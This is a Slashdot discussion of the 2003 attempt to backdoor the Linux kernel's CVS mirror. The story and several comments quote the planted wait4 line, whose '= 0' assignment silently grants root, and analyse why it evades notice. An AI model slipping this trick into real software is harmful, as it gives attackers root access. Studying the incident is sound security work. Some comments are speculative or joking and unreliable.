The Linux Backdoor Attempt of 2003

Hugh Pickens DOT Com writes "Ed Felton writes about an incident, in 2003, in which someone tried to backdoor the Linux kernel. Back in 2003 Linux used BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. But some people didn't like BitKeeper, so a second copy of the source code was kept in CVS. On November 5, 2003, Larry McAvoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in electronically to the CVS server and inserted a small change to wait4: 'if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) ...' A casual reading makes it look like innocuous error-checking code, but a careful reader would notice that, near the end of the first line, it said '= 0' rather than '== 0' so the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words it's a classic backdoor. We don't know who it was that made the attempt—and we probably never will. But the attempt didn't work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. 'Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack,' writes Felton. 'Unless somebody confesses, or a smoking-gun document turns up, we'll never know.'"

OMG enough

[Virtucon]

Unless somebody has proof that somebody was trying to create a back door then stop with all of the "X-Files" shit. It could have been a hacker trying to put that code in. How was the system that hosted the CVS repository managed? Was it hacked? Was there any investigation or was it possibly somebody that did something stupid and now everybody thinks it's somehow tied to the NSA?!?!?

Let's just go forward with what we know and stop the speculation, that is unless somebody has some hard facts like an IP address that belongs to the government or a chain of evidence.

Re:OMG enough

[sqorbit]

It's just like the "We can't explain this, so it must have been aliens" philosophy. If someone tried to create a backdoor, it must be the NSA. Not some bored hacker or some other explanation.

Re:OMG enough

[djmurdoch]

Unless somebody has proof that somebody was trying to create a back door then stop with all of the "X-Files" shit. It could have been a hacker trying to put that code in. How was the system that hosted the CVS repository managed? Was it hacked? Was there any investigation or was it possibly somebody that did something stupid and now everybody thinks it's somehow tied to the NSA?!?!?

Yes, there was an investigation. The name attached to the log entries belonged to someone who said he didn't make the changes.

Re:OMG enough

[Virtucon]

L. McVoy...

It's not a big deal, we catch stuff like this, but it's annoying to the
CVS users.

My Favorite from A. Walrond..

Somebody getting access to and inserting exploits directly into the linux
source is not something we should take lightly. Whilst we understand the
limits of the problem, the fact that it happened at all could get /.'d out of
all proportion and be used to seriously undermine linux's reputation

Note, back in 2003, "/.'d out of all proportion..." which is exactly what this article is all about.

Re:OMG enough

[Alomex]

Actually in this very specific case the Occam razor's version of event was a malicious attempt.

Just the other day I arrived at work to find traces of my externally accessible office door being jimmied. Now what is more likely (1) that the janitors lost the master key and forced their way in to vacuum clean or (2) that someone (likely a petty burglar) opened it and took my missing radio?

There is a suid exploit inserted in an unauthorized way. The simplest explanation is a backdoor attack. The subsequent investigation seems to support this further, even though we still do not know with certainty since the guilty person was never caught. However we can operate on the assumption that this was a malicious attack and discuss it as such.

Re:OMG enough

[Russ1642]

There's a 50% chance it was aliens. Either it was aliens, or it wasn't aliens.

Re:OMG enough

[ShanghaiBill]

Unless somebody has proof that somebody was trying to create a back door then stop with all of the "X-Files" shit.

The code snippet is an obvious attempt at a backdoor. What more "proof" do you need?

It could have been a hacker trying to put that code in.

So? How does that make it "not a backdoor"? The code is the same regardless of who put it there.

Some obvious lessons from this are:
1. Run your compiler with the warnings on.
2. Use lint.
Either of these would have flagged this problem.

When run with "gcc -Wall", this warning is produced: warning: suggest parentheses around assignment used as truth value.

Re:OMG enough

[gstoddart]

I do listen to the news, so prove to me that it was the NSA rather than some bored college student looking to inject some mayhem?

And why would I seek to prove something to you that it says right in the damned article that nobody knows who did it, or why, or how? I certainly never claimed it was the NSA, and even TFS suggest that, while it could have been the NSA, they don't know.

There is direct proof someone tried to insert a back door, but as far as who did it, nobody fucking knows, and TFS even says that.

Given what the NSA is doing lately, they're a plausible guess, but, there is no proof to suggest what entity did that ... NSA, bored college student, the Chinese, aliens, your mom. It says right in the summary they don't know, and unless someone admits to it, they never will -- but nonetheless, code did magically end up in the code repository they couldn't account for and which they caught. So someone did attempt to insert a back door, that much is fact -- the rest of it is speculation, and that's pretty much evident that it is speculation.

You're asking for proof of something that people are only suggesting as a possibility, not claiming as fact. Which means you're not even debating the article, you're debating something the article didn't say but you're acting as if it did.

You're tilting at windmills there dude.

Re:OMG enough

[TheCarp]

> The code snippet is an obvious attempt at a backdoor. What more "proof" do you need?

Actually, the code snippet, without context is not an obvious attempt. It is a cleverly hidden attempt that COULD be a genuine error.

However, having no approved submission to track it back to, that makes it an obvious attempt, even more so with evidence that the hosting system was compromised.

I would even call it obvious if they had an approved submission if the submitter didn't have some good justification for mucking with an error handler for a case that shouldn't happen, those tend to not need much maintenance.

Re:OMG enough

[gstoddart]

I would probably be more apt to name the

In the absence of evidence, I would be more likely to refrain from naming anybody.

Some unknown actor did it, how and for what reasons is completely unknown. Had it worked it would have resulted in a backdoor.

Listing shady entities it could have been might be a fun game, but it's meaningless. And TFS pretty much says that.

Re:OMG enough

[gstoddart]

Or there was a coding error.

A coding error, which got into CVS and bypassed BitKeeper, for which there's no commit logs to account for it? And which by sheer fluke would also have been an exploit?

Sure, it could have been a coding error, but the description of how they found it and what they couldn't subsequently find would strongly suggest that this got in there by some really, er, 'unusual' mechanism.

It sounds like they did the forensics at the time, and that it didn't come in through any mechanism any of them could account for.

If I understood correctly, this didn't get into CVS from a commit, it just ended up in there. And in many years of working with CVS, I'm pretty sure I've never seen that happen.

Re: OMG enough

[Simon+Brooke]

The fact that

1. This patch was sneaked into CVS bypassing the proper channels;
2. The submitter identity was (allegedly) forged;
3. The UID assignment was surrounded in parentheses to prevent a compiler warning

strongly suggest that this was a deliberate feature, and not a casual error. I've done a lot of security audits of mission critical systems in my time and I've seen a lot of potentially catastrophic casual errors. You can always see what (innocent) thing the programmer intended to do. There's no 'innocent' thing this change could do. This is intended.

Who intended it? That's another question.

Re:OMG enough

[jcochran]

Obviously you're unaware of how GCC works. Yes, it would have issued a warning message if the line was:
wait4: if ((options == (__WCLONE|__WALL)) && current->uid = 0) ...

But the author of that little backdoor attempt added the extra 'superfluous' parenthesis around the assignment. Like this:
wait4: if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) ...

And GCC uses those extra parenthesis as an indication that 'The assignment is deliberate and desired. Don't warn me about it. I know what I'm doing'
In fact, GCC still uses those extra parenthesis as an indication that the warning message should be suppressed.

Re:OMG enough

[LanceUppercut]

That is actually misguided reasoning. If you remove this parenthesis and write it like that
if ((options == (__WCLONE|__WALL)) && current->uid = 0)
the code will fail to compile for a completely different reason. In C (as well as in C++) the assignment operator has very low priority, lower than `&&` operator. That means that the above code would be interpreted as
if (((options == (__WCLONE|__WALL)) && current->uid) = 0)
A code like that would not compile at all, since it attempts to assign 0 to something that is not lvalue. For this reason (and not some "warning"), you actually absolutely need that extra parenthesis.
Also, note that the first condition is also wrapped in parenthesis, which is formally excessive ('==' has higher priority than `&&`, but some users prefer to add that extra parenthesis since they believe it improves readability). For this reason, it is fairly safe to conclude that both parentheses where there from the very beginning. They were not added by that malicious coder.

C/C++ operator =

[Jamu]

It's why placing constants on the left of the equality operator is a good idea in C/C++. The whole line then looks suspicious because its constants are on the right, and the first thing you'll think about is bugs involving operator = instead of operator ==. Unfortunately there's a lot of old code that doesn't do this, but it's easy enough for a compiler to issue warnings about operator = in if-statements.

Re:C/C++ operator =

[dfghjk]

"Unfortunately there's a lot of old code that doesn't do this..."

Nice implication that this is a standard rather than a preference. A lot of new code "doesn't do this" either because a lot of people don't feel like you do, myself included.

Writing expressions backwards hampers the readability of code and only theoretically catches problems. I can count on one hand the times in my career I've suffered this particular fate and I'm not going to pay a price every day for a structural "solution" to a problem I don't have. I've been working with programmers that do this for 20 years and have never found it to be anything but a nuisance. If it works for them, fine, but it doesn't go into my work. I'm not weak but if you are then by all means, use your crutch.

Sometimes the answer is be better at what you do. Once upon a time you could declare a local variable in a switch statement without explicitly limiting scope. Now you must incur the wrath of the nanny compiler or pollute your code with compiler-pacifying turds. This could be made to work right but the same people who think we need shit like this can't be bothered doing a proper job of implementing it. We have attitudes such as yours to thank for crap like that.

At my new job there are debates on what compiler warming levels to adopt. The reason is the release process enforces a no-tolerance policy for warnings and there's a large code base that will never be warning-free at higher levels. This is what you get when you create compiler-enforced "rules" rather than focus on skills and better code quality, particularly when you abdicate to tools you don't control or even understand.

Re:Repost

[squiggleslash]

You're forgetting that the NSA is in the news right now, which creates an entirely new angle on it.

I was able to get a copy of the original submission:

Ed Felton writes about an incident, in 2003, in which someone tried to backdoor the Linux kernel, a key component of the GNU/Linux operating system. As you know, Apple just released a new operating system called iOS 6. Is it possible that an NSA contractor, paid in Bitcoins raised through an anonymous Kickstarter project to avoid detection, placed an exploit in the new iPhone 5S? And if so, should the government immediately investigate Google who might have used the feature to implement some sort of tracking bug for people using their iPhones in their Teslas?

Repost

[jovius]

http://linux.slashdot.org/story/03/11/06/058249/linux-kernel-back-door-hack-attempt-discovered

Re:Repost

[i+kan+reed]

Not just in the news, but documented as having worked with software companies to inject backdoors into software, and hints that they may have specifically solicited Linus to do that with Linux.

Re:I hope they monitor integrity more carefully

[Todd+Knarr]

It is monitored more carefully. Notice that the backdoor was only introduced into the CVS copy, which wasn't the official copy used to create kernel releases. It never made it into the official copy in BitKeeper, because to get there it would've had to go through the official review and approval process that would've caught and rejected it. And without making it into the BitKeeper repository it never would've been used by any major distribution, only by developers and private distributions that pulled from the CVS copy because of objections to BitKeeper.

And today even that unofficial copy is gone. With the change to git I believe there aren't any secondary copies in other version-control systems except maybe private ones developers keep for whatever reason which wouldn't be able to feed changes back into the main repository without going through the review and approval process every submission has to go through.

Long and short, the Linux kernel repository's no more vulnerable than the internal repositories for Windows or the Oracle database system, and it's probably less vulnerable. Microsoft or Oracle's repositories will take commits from any random contractor that's been hired to work on the code, regardless of their background or history. The Linux repository... it may accept submissions from anyone, but the degree of review before approving the submission depends heavily on how well the project maintainers know the submitter. The first submissions from someone the maintainer doesn't know are going to be reviewed with a fine-toothed comb and a skeptical eye, and very few black-hats are going to be willing to spend years submitting high-quality code to build up enough of a reputation with the maintainer to be able to get code in with only a cursory review. It's the difference between a development team and a developer community.

Re:Type safety

[ultrasawblade]

Here's why the UID is 0 and should stay 0.

In most assembly languages, when you compare against a value, you have use a "compare" instruction that effectively does a subtraction, but throws away the result.
In most CPUs, there is a flags register with a zero (Z) bit, which is flipped whenever a value is loaded that is zero.
When you want to see if something like your accumulator or another register is an arbitrary value like 100, you need to do a "compare 100" and then "branch if equal to whatever..."
If it's zero, you can just load the value and skip the compare step. You get a "free compare" when the value you want to compare against is zero.
So if the superuser is not zero, there will be a performance penalty.

Besides, this dumb shit is C's fault for using = and == as operators. Pascal had it right with := being the assignment operator.

Re:NSA (Probably) installed one Anyway

[jandrese]

I thought SELinux was a clever plan to make security so obnoxious that everybody turns it off and leaves their machines vulnerable to attack.

Underhanded C Contest

[KingofSpades]

I'm suprised that no one mentioned the Underhanded C Contest
http://underhanded.xcott.com/

Quoting their web site:
"The goal of the contest is to write code that is as readable, clear, innocent and straightforward as possible, and yet it must fail to perform at its apparent function. To be more specific, it should do something subtly evil. "